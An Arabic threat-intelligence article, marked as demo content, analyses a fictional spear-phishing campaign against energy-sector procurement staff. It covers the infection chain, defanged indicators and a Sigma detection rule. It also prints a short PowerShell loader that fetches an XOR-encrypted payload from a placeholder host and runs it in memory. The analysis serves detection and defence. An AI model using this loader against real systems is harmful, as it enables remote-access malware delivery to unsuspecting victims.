سيبرانا
استخبارات التهديداتاستخبارات تهديداتعاليةمحتوى تجريبي

حملة تصيّد موجّهة تستهدف قطاع الطاقة بمستندات مناقصات مزيفة — تحليل تقني

تستخدم الحملة ملفات مضغوطة محمية بكلمة مرور تحتوي على اختصارات تنفّذ سكربت PowerShell يحمّل أداة وصول عن بُعد. نستعرض سلسلة الإصابة ومؤشرات الاختراق وقواعد الكشف.

نُشر
حُدّث:
دقيقة واحدة قراءة
مشاركة:XLinkedInFacebookTelegramWhatsApp
رسم توضيحي مجرد لرسائل بريد وطُعم رقمي
رسم توضيحي — سيبرانا (محتوى تجريبي)

رصد فريق سيبرانا (في هذا السيناريو التجريبي) حملة تصيّد موجّهة تستهدف موظفي المشتريات والعقود في شركات الطاقة بالمنطقة. تصل الرسائل من نطاقات مسجّلة حديثًا تحاكي أسماء جهات حكومية، وتحمل عنوانًا من قبيل «دعوة لتقديم عرض — مشروع توسعة».

سلسلة الإصابة

  1. رسالة بريد تحمل ملفًا مضغوطًا محميًا بكلمة مرور مذكورة في نص الرسالة (لتجاوز الفحص على البوابة).
  2. داخل الملف اختصار .lnk بأيقونة PDF يشغّل PowerShell بوسيطات مخفية.
  3. السكربت ينزّل حمولة مشفّرة من خادم يحاكي خدمة مشاركة ملفات، ويفكّ تشفيرها في الذاكرة.
  4. تُحقن أداة الوصول عن بُعد في عملية شرعية وتحقق الاستمرارية عبر مهمة مجدولة.

السكربت الأولي (مبسّط)

stage1.ps1 (تجريبي)
$u = "https://files-share.example.net/t/" + $env:COMPUTERNAME
$b = (New-Object Net.WebClient).DownloadData($u)
$k = [Text.Encoding]::ASCII.GetBytes("d3m0-k3y")
$d = 0..($b.Length-1) | % { $b[$_] -bxor $k[$_ % $k.Length] }
[Reflection.Assembly]::Load([byte[]]$d).EntryPoint.Invoke($null, $null)

لاحظ استخدام اسم الجهاز في المسار: يسمح ذلك للمهاجم بتقديم حمولة مختلفة لكل ضحية أو حجبها عن بيئات التحليل.

مؤشرات الاختراق

مؤشرات الحملة (قيم تجريبية من نطاقات توثيقية)
domainfiles-share[.]example[.]netخادم توزيع الحمولة
domaintenders-portal[.]example[.]orgنطاق إرسال رسائل التصيّد
ipv4198[.]51[.]100[.]23خادم القيادة والتحكم
sha256a94f2c8e1b3d5f7a9c0e2b4d6f8a1c3e5b7d9f0a2c4e6b8d0f1a3c5e7b9d2f4aملف الاختصار
sha256c17e3a9b5d2f8c4e6a0b1d3f5a7c9e2b4d6f8a0c1e3b5d7f9a2c4e6b8d0f3a5cالحمولة بعد فك التشفير

الروابط والعناوين معطَّلة (defanged) للحماية

قاعدة كشف مقترحة

sigma-lnk-powershell.yml
title: LNK spawning PowerShell with hidden window and download
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    ParentImage|endswith: '\\explorer.exe'
    Image|endswith: '\\powershell.exe'
    CommandLine|contains|all:
      - '-w hidden'
      - 'DownloadData'
  condition: selection
level: high
مشاركة:XLinkedInFacebookTelegramWhatsApp
عمر بن سالم

عن الكاتب

عمر بن سالم

محرر أول — التهديدات والبرمجيات الخبيثة

ملف تعريفي تجريبي لأغراض العرض. يكتب «عمر» عن العائلات الخبيثة، عصابات الفدية، واستخبارات التهديدات، مع تركيز على التحليل التقني القابل للتنفيذ.

  • البرمجيات الخبيثة
  • استخبارات التهديدات
  • برامج الفدية
كل مقالات عمر بن سالم